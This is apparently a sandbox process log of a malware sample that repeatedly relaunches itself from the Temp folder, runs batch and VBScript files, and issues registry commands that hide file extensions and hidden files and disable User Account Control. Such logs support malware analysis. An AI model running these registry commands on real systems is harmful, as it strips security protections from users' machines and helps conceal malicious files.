C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEsQcwAQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EKcgUEMc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yEQscsUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xQgIYQow.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RcksAEEw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EYsIAgYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nGcAgMYo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FCssEUcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QAoswYMc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KukkIgUY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WqwYwEsU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nygskcUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pooYkQwA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qCgsAMsc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HEcAEUMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nokggUUE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgQkkMAI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foIEQQgk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HaQQgwkQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwAcgAME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

